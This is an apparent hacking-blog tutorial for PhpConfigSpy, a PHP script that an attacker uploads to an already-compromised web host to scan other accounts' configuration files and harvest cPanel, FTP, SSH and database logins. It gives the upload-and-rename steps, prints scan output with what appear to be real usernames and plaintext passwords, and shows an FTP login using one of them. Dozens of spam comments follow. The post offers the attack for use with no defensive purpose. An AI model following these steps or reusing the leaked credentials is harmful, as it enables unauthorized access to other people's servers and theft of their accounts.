PhpConfigSpy v0.2 – Scan and Grab Login
Posted by newbiekidApr 27
PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported ssh) and maybe database login.
Most of us, after getting a web target (Via inject PHP) we will use that web only for BOT (EGGDROP, PSYBNC). Why we do not try to get full access to the Web target.
Let’s we try to get some information login from web target with PhpConfigSpy tool.
Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of scaning :
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…
[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success
Binggo… That is success !!!
You can check that username via FTP or SSH (if target supported SSH)
Let we check together for this login
[FTP] bsidenet:bside123 Success
That’s mean user : bsidenet and password : bside123
C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>
It’s Work Bro 
39 comments
Pingback by º TuToriaL CuamPuR AdUk SemBarAnG KaLiR º on May 19, 2009 at 10:50 am
[...] the user and password
) even though ssh shell is cannot started. You can scan the target using phpconfigspy to grab and get the login password. Let’s we started the lesson. I find the target and [...]
Comment by Kelly Brown on June 13, 2009 at 2:34 am
The best information i have found exactly here. Keep going Thank you
Comment by JaneRadriges on June 14, 2009 at 7:53 am
The article is ver good. Write please more
Comment by KattyBlackyard on June 15, 2009 at 9:57 am
I really like your post. Does it copyright protected?
Comment by newbiekid on June 16, 2009 at 10:51 am
this is free tutorial my bro, you can repost it on your blog. But please make some information about my blog
.
Thanks
Comment by KonstantinMiller on July 7, 2009 at 10:14 am
Hi. I like the way you write. Will you post some more articles?
Comment by newbiekid on July 17, 2009 at 11:59 pm
i will post what i know and of course for our experience
Comment by Bruivinia on December 7, 2009 at 12:47 pm
This is my first word
Hi
Comment by Yahoouj on February 23, 2010 at 8:50 pm
Really good work about this website was done. Keep trying more – thanks!
Comment by aDxjEKc8k0c on August 30, 2010 at 3:39 pm
I want to post quick hello and want to say appriciate for this good article. rFeHjM8MAP633k
Comment by SymnAnommaTam on September 28, 2010 at 12:24 pm
Amazon launched two new Kindle e-readers priced at $139 and $189 late Wednesday, with the cheaper version a Wi-Fi-only e-reader and $10 less than the Wi-Fi-only Nook.
ComputerWorld
http://www.computerworld.com/
Comment by G2dgk9 on October 21, 2010 at 4:46 am
I want to post quick hello and want to say appriciate for this good article. km2ZFLwQ1eDA6f
Comment by Daniel on December 18, 2010 at 4:20 am
great post, thanks for sharing
Comment by prooptede on December 27, 2010 at 2:19 am
Account unlimited signal to consolidation in well-founded settled masses, gibber
included, there is a gargantuan required on studying English not soberly in those parts of the in the seventh islands extravagantly, where English is not a moor language. This conclusion leads us that there is elephantine importunity in out of sorts wishes of English-speaking tutors, who are specializing in teaching English. South Korea is a clear-cut of most irrefutable countries in terms of propagative betterment, which means teaching English in Korea would be influentially profitable.
click here
Comment by bicsBaila on January 1, 2011 at 11:53 pm
Right, they eminent to be taught that filing lawsuits is not the trajectory to overexertion idle piracy. As an best, it’s to command something person than piracy. Like quietness of use. It’s indubitably a the uncut supplies easier to utter iTunes than to search the Internet with imperil of malware and then crappy importance, but if people are expected to extend loads and lacuna against ages, it’s not helpful to work. They not quite spur a uncivil measure in days of yore people delineate software and Cobweb sites that descend upon to it ridiculously calm to infringer, and up the quality. If that happens, then there compel be no stopping piracy. But they’re too sharp and timorous of losing. Risks suffer with to be enraptured!
And
Comment by Jude Bisikirski on January 15, 2011 at 3:53 am
very good stuff. Do you have an RSS feed? And would it be cool if I added your feed to a website of mine? I have a site that draws content through RSS feeds from a number of sites and I’d like to add yours, a lot of people do not mind considering I link back and everything but I like to get approval first. Anyhow let me know if you could, thank you,Regards, Jude Bisikirski.
Comment by student loans on January 21, 2011 at 3:08 am
My partner and I really enjoyed reading this blog post, I was just itching to know do you trade featured posts? I am always trying to find someone to make trades with and merely thought I would ask.
Comment by newbiekid on January 21, 2011 at 10:06 am
@Jude : my website didn’t create RSS, maybe next time i will create it. Thanks
Comment by propecia on January 23, 2011 at 9:39 am
Youre so cool! I dont suppose Ive learn anything like this before. So nice to find any individual with some unique ideas on this subject. realy thanks for starting this up. this web site is something that’s needed on the web, somebody with just a little originality. helpful job for bringing something new to the web!
Comment by opthamologists on January 24, 2011 at 6:11 pm
Superb blog post, I have book marked this internet site so ideally I’ll see much more on this subject in the foreseeable future!
Comment by maria andros on January 25, 2011 at 6:41 pm
I really liked your blog! It helped me alot…
Comment by Valium on January 26, 2011 at 4:50 am
Spot on with this write-up, I really assume this website wants way more consideration. I’ll probably be once more to read way more, thanks for that info.
Comment by beraLilabet on January 26, 2011 at 12:17 pm
apa yang saya cari, terima kasih
Comment by sleep aids on January 26, 2011 at 8:02 pm
You made some respectable factors there. I regarded on the web for the difficulty and found most people will go along with along with your website.
Comment by levitra on January 28, 2011 at 3:14 am
There may be noticeably a bundle to learn about this. I assume you made sure nice points in options also.
Comment by viagra on January 28, 2011 at 8:23 pm
There are some interesting deadlines on this article but I don’t know if I see all of them center to heart. There’s some validity however I’ll take maintain opinion until I look into it further. Good article , thanks and we would like extra! Added to FeedBurner as nicely
Comment by nail fungus treatment on January 29, 2011 at 8:05 am
I’d have to examine with you here. Which is not something I normally do! I enjoy reading a post that will make people think. Additionally, thanks for allowing me to comment!
Comment by Guenithen on January 30, 2011 at 11:44 pm
I had a good time here but will return to google now.
Comment by vigrx on January 31, 2011 at 6:43 pm
There are definitely a number of details like that to take into consideration. That is a great level to bring up. I provide the ideas above as general inspiration but clearly there are questions like the one you convey up where crucial factor might be working in trustworthy good faith. I don?t know if best practices have emerged round issues like that, however I’m sure that your job is clearly identified as a good game. Both girls and boys feel the affect of only a second’s pleasure, for the rest of their lives.
Comment by Cialis on February 2, 2011 at 6:43 am
This actually answered my drawback, thanks!
Comment by cialis on February 5, 2011 at 12:04 am
Thanks for providing really informative articles on your website. How can I bookmark it?
Comment by pacman on February 10, 2011 at 8:25 am
Good post. I be taught something more difficult on different blogs everyday. It’s going to all the time be stimulating to read content from other writers and practice a bit one thing from their store. I’d desire to use some with the content material on my weblog whether or not you don’t mind. Natually I’ll provide you with a link in your web blog. Thanks for sharing.
Comment by jigsaw on February 10, 2011 at 9:20 am
very nice put up, i actually love this web site, carry on it
Comment by Free porn on February 10, 2011 at 12:54 pm
Aw, this was a really nice post. In concept I want to put in writing like this additionally – taking time and precise effort to make a very good article… however what can I say… I procrastinate alot and not at all seem to get one thing done.
Comment by electronic cigarette on February 23, 2011 at 11:32 am
Aw, this was a really nice post. In concept I would like to put in writing like this moreover ? taking time and precise effort to make an excellent article? however what can I say? I procrastinate alot and in no way appear to get one thing done.
Comment by debt advice on March 5, 2011 at 11:00 pm
I had a smashing continuously reading on all sides your transmit as I announce it extensively. Excellent article! I am looking clockwise to hearing more from you
Comment by Vinnie Vandall on March 5, 2011 at 11:55 pm
Thank you for spending some time to look at this, I think strongly regarding it and love learning a lot more about this topic. If perhaps feasible, while you gain knowledge, could you mind adding to your website together with further advice? It is exceptionally interesting for my situation.
Comment by Free Macbook Pro on April 13, 2011 at 6:34 pm
That is very interesting, You’re a very skilled blogger. I’ve joined your rss feed and look forward to in the hunt for more of your magnificent post. Additionally, I’ve shared your web site in my social networks!
Comment by kursi sintetik rotan on April 14, 2011 at 8:46 am
I needed to write down a brief notice in buy to thanks for all the fantastic suggestions you might be placing at this website. My prolonged internet research has at the finish of the day been recognized with reliable details and techniques to trade with my co-workers. I would assert that a number of of us readers really are truly lucky to live in a useful location with quite a great deal of superb individuals with insightful pointers.